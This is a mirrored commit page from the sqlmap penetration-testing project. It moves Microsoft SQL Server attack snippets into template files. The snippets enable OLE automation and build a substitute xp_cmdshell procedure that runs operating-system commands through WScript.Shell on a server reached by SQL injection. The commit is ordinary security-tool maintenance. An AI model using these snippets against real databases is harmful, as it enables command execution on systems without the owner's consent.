mirror of
https://github.com/sqlmapproject/sqlmap.git
synced 2025-02-03 13:14:13 +03:00
working on #51
This commit is contained in:
Bernardo Damele
parent
7335072ab8
commit
fd4cfb0cc0
|
|
@ -41,23 +41,14 @@ class xp_cmdshell:
|
||||||
if Backend.isVersionWithin(("2005", "2008")):
|
if Backend.isVersionWithin(("2005", "2008")):
|
||||||
logger.debug("activating sp_OACreate")
|
logger.debug("activating sp_OACreate")
|
||||||
|
|
||||||
cmd += "EXEC master..sp_configure 'show advanced options',1;"
|
cmd = getSPQLSnippet(DBMS.MSSQL, "activate_sp_oacreate")
|
||||||
cmd += "RECONFIGURE WITH OVERRIDE;"
|
|
||||||
cmd += "EXEC master..sp_configure 'ole automation procedures',1;"
|
|
||||||
cmd += "RECONFIGURE WITH OVERRIDE"
|
|
||||||
inject.goStacked(agent.runAsDBMSUser(cmd))
|
inject.goStacked(agent.runAsDBMSUser(cmd))
|
||||||
|
|
||||||
self.__randStr = randomStr(lowercase=True)
|
self.__randStr = randomStr(lowercase=True)
|
||||||
self.__xpCmdshellNew = randomStr(lowercase=True)
|
self.__xpCmdshellNew = "xp_%s" % randomStr(lowercase=True)
|
||||||
self.xpCmdshellStr = "master..xp_%s" % self.__xpCmdshellNew
|
self.xpCmdshellStr = "master..%s" % self.__xpCmdshellNew
|
||||||
|
|
||||||
cmd = "DECLARE @%s nvarchar(999);" % self.__randStr
|
cmd = getSPQLSnippet(DBMS.MSSQL, "create_new_xp_cmdshell", RANDSTR=self.__randStr, XP_CMDSHELL_NEW=self.__xpCmdshellNew)
|
||||||
cmd += "set @%s='" % self.__randStr
|
|
||||||
cmd += "CREATE PROCEDURE xp_%s(@cmd varchar(255)) AS DECLARE @ID int " % self.__xpCmdshellNew
|
|
||||||
cmd += "EXEC sp_OACreate ''WScript.Shell'',@ID OUT "
|
|
||||||
cmd += "EXEC sp_OAMethod @ID,''Run'',Null,@cmd,0,1 "
|
|
||||||
cmd += "EXEC sp_OADestroy @ID';"
|
|
||||||
cmd += "EXEC master..sp_executesql @%s" % self.__randStr
|
|
||||||
|
|
||||||
if Backend.isVersionWithin(("2005", "2008")):
|
if Backend.isVersionWithin(("2005", "2008")):
|
||||||
cmd += ";RECONFIGURE WITH OVERRIDE"
|
cmd += ";RECONFIGURE WITH OVERRIDE"
|
||||||
|
|
|
||||||
4
procs/mssqlserver/activate_sp_oacreate.txt
Normal file
4
procs/mssqlserver/activate_sp_oacreate.txt
Normal file
|
|
@ -0,0 +1,4 @@
|
||||||
|
EXEC master..sp_configure 'show advanced options',1;
|
||||||
|
RECONFIGURE WITH OVERRIDE;
|
||||||
|
EXEC master..sp_configure 'ole automation procedures',1;
|
||||||
|
RECONFIGURE WITH OVERRIDE"
|
||||||
8
procs/mssqlserver/create_new_xp_cmdshell.txt
Normal file
8
procs/mssqlserver/create_new_xp_cmdshell.txt
Normal file
|
|
@ -0,0 +1,8 @@
|
||||||
|
DECLARE @%RANDSTR% nvarchar(999);
|
||||||
|
set @%RANDSTR%='
|
||||||
|
CREATE PROCEDURE %XP_CMDSHELL_NEW%(@cmd varchar(255)) AS DECLARE @ID int
|
||||||
|
EXEC sp_OACreate ''WScript.Shell'',@ID OUT
|
||||||
|
EXEC sp_OAMethod @ID,''Run'',Null,@cmd,0,1
|
||||||
|
EXEC sp_OADestroy @ID';
|
||||||
|
EXEC master..sp_executesql @%RANDSTR%
|
||||||
|
|
||||||
Loading…
Reference in New Issue
Block a user